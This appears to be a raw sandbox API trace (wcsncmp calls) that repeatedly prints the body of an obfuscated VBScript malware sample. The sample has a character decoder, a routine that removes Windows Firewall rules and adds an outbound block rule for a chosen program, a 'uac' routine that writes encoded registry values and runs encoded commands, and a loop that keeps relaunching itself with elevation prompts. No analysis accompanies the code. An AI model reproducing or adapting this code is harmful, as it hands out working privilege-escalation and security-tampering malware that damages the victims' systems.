policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.944] wcsncmp (_String1=")-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.944] wcsncmp (_String1="-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0222.944] wcsncmp (_String1="1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.944] wcsncmp (_String1=")\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 